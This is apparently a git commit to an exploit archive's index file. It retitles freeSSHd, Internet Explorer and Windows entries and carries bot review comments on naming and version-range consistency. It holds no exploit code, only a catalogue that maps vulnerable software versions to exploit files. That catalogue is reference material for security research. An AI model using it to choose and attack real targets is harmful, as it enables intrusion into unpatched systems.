DB: 2016-12-04

2 new exploits

FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated

FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)

FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)

FreeSSHd 1.2.4 - Denial of Service
freeSSHd 1.2.4 - Denial of Service

FreeSSHd - Denial of Service (PoC)
freeSSHd - Denial of Service (PoC)

onehttpd 0.7 - Denial of Service
OneHTTPD 0.7 - Denial of Service

FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service

FreeSSHd 1.3.1 - Denial of Service
freeSSHd 1.3.1 - Denial of Service

Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)
Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)

Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)
Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)

Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)
Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)

FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow

FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow
freeSSHd 1.2.1 - Authenticated Remote SEH Overflow

FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)
freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)

FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)

FreeSSHd 2.1.3 - Remote Authentication Bypass
freeSSHd 2.1.3 - Remote Authentication Bypass

FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)
freeSSHd 1.2.6 - Authentication Bypass (Metasploit)

Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)

Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution

Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection
Joomla! Component MyContent 1.1.13 - Blind SQL Injection

Xfinity Gateway - Remote Code Execution
Offensive Security 2016-12-04 05:01:23 +00:00
parent 4b3da08aa9
commit 0a2e79b884
3 changed files with 125 additions and 19 deletions


@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
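Review bot: while 5709 is being retitled, its word order ("Remote Stack Overflow PoC Authenticated") is still out of step with the sibling freeSSHd rows touched in this same commit (6800 and 6812 read "Authenticated SFTP ... Remote Buffer Overflow (PoC)"). Suggest "freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)" so the "Authenticated" qualifier and the "(PoC)" suffix sit where every other entry puts them.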
@ -835,9 +835,9 @@ id,file,description,date,author,platform,type,port
6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0 6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0 6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0
6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0
6800,platforms/windows/dos/6800.pl,"FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
6812,platforms/windows/dos/6812.pl,"FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port
11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
11842,platforms/windows/dos/11842.py,"FreeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0 11842,platforms/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port
18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
18268,platforms/windows/dos/18268.txt,"FreeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0 18268,platforms/windows/dos/18268.txt,"freeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
@ -3519,7 +3519,7 @@ id,file,description,date,author,platform,type,port
27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0
27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0 27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0
27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0
27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 27553,platforms/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0 27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0
27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0 27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0
27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0 27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0
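Review bot: the 27553 rename runs in the opposite direction from every other vendor-name fix in this commit: freeSSHd loses its capital F to match the vendor's own spelling, but onehttpd gains capitals (OneHTTPD). Confirm the project's own spelling before accepting; if the vendor writes it lowercase, the original row was already correct and this line should be reverted.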
@ -3930,7 +3930,7 @@ id,file,description,date,author,platform,type,port
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
31218,platforms/linux/dos/31218.txt,"FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
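Review bot: 31218 keeps platform "linux" for a freeSSHd row, while every other freeSSHd line in this diff (5709, 6800, 6812, 11842, 18268, 38001, 1787, 5751, 8295, 16461, 23080) is filed under "windows". Since the line is being edited anyway, check the exploit header and correct the platform column if this is a misfile; a Windows SSH server listed under Linux will not surface for anyone filtering by platform.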
@ -4609,7 +4609,7 @@ id,file,description,date,author,platform,type,port
37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0 37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
38001,platforms/windows/dos/38001.py,"FreeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0
37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
@ -5264,7 +5264,7 @@ id,file,description,date,author,platform,type,port
40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0 40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
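Review bot: the enumerated "9/10/11" for 40748 is the right fix, because this file uses "<" as an exclusive upper bound elsewhere in the same diff ("LibSPF2 < 1.2.8" at 6805, "Linux Kernel < 2.4.20" at 12), so the old "9 < 11" read as "below 11" and silently dropped IE 11 from the affected set. Suggest a one-off pass over files.csv for the "N < M" pattern between small version numbers to catch the remaining inclusive uses together rather than one commit at a time.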
@ -5286,7 +5286,7 @@ id,file,description,date,author,platform,type,port
40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0 40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0 40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8337,7 +8337,7 @@ id,file,description,date,author,platform,type,port
37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0
37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
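Review bot: the 37064 change is semantic, not cosmetic: "8.0 < 8.1 (x64)" could be read as "8.0 up to but excluding 8.1", whereas "8.0/8.1 (x64)" states outright that 8.1 x64 is an affected target. Verify against the exploit's own header that 8.1 is actually listed as tested or affected before accepting, since the description column is what searches and cross-references will surface.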
@ -9129,7 +9129,7 @@ id,file,description,date,author,platform,type,port
1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203 1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
1787,platforms/windows/remote/1787.py,"FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22 1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0 1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
